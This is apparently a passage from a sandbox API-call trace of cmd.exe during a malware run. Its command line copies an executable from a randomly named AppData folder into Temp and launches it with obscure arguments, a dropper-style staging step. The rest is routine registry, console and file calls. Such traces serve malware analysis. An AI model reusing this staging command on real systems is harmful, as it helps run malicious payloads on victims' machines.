HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.617] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fde4 | out: phkResult=0x28fde4*=0x0) returned 0x2 [0112.617] VirtualQuery (in: lpAddress=0x28fe1b, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0112.617] GetConsoleOutputCP () returned 0x1b5 [0112.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.618] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.618] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0112.618] GetEnvironmentStringsW () returned 0x3e0380* [0112.619] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.619] GetEnvironmentStringsW () returned 0x3e0380* [0112.619] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.619] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed54 | out: phkResult=0x28ed54*=0x40) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x30, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x0, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegCloseKey (hKey=0x40) returned 0x0 [0112.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed54 | out: phkResult=0x28ed54*=0x40) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x0, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.620] RegCloseKey (hKey=0x40) returned 0x0 [0112.620] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635a [0112.620] srand (_Seed=0x5b88635a) [0112.620] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0112.620] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0112.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0112.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.620] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.620] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0112.620] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0112.620] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0112.620] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0112.620] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0112.621] GetEnvironmentStringsW () returned 0x3e24d0* [0112.621] FreeEnvironmentStringsW (penv=0x3e24d0) returned 1 [0112.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0112.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0112.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0112.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0112.621] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0112.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.621] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb20, lpFilePart=0x28fb1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb1c*="Desktop") returned 0x18 [0112.621] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.621] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.621] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.622] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0112.622] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0112.622] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0112.622] GetEnvironmentStringsW () returned 0x3e0380* [0112.622] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.622] GetConsoleOutputCP () returned 0x1b5 [0112.622] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.622] GetUserDefaultLCID () returned 0x409 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fc60, cchData=128 | out: lpLCData="0") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fc60, cchData=128 | out: lpLCData="0") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fc60, cchData=128 | out: lpLCData="1") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0112.623] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0112.624] GetConsoleTitleW (in: lpConsoleTitle=0x3d0a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.624] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.624] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0112.624] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0112.624] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0112.625] _wcsicmp (_String1="type", _String2=")") returned 75 [0112.625] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0112.625] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0112.625] _wcsicmp (_String1="IF", _String2="type") returned -11 [0112.625] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0112.625] _wcsicmp (_String1="REM", _String2="type") returned -2 [0112.625] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0112.630] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 68 [0112.630] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 68 [0112.630] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 71 [0112.630] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 71 [0112.630] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 80 [0112.630] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 80 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] GetFileType (hFile=0x7) returned 0x2 [0112.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28faf4 | out: lpMode=0x28faf4) returned 1 [0112.633] _dup (_FileHandle=1) returned 3 [0112.634] _close (_FileHandle=1) returned 0 [0112.634] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", _String2="con") returned -53 [0112.634] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28fac4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0112.634] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0112.634] GetConsoleTitleW (in: lpConsoleTitle=0x28f8f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.719] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0112.719] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0112.719] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0112.719] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0112.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.720] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x28f458, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f458) returned 0x3d0f60 [0112.720] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0112.720] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0112.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0112.720] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28e364, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.721] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] GetFileType (hFile=0x54) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28e3bc | out: lpFileSizeHigh=0x28e3bc*=0x0) returned 0x7d600 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.721] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] GetFileType (hFile=0x4c) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] GetFileType (hFile=0x4c) returned 0x1 [0112.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.721] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.722] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.723] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] GetFileType (hFile=0x4c) returned 0x1 [0112.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.723] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c 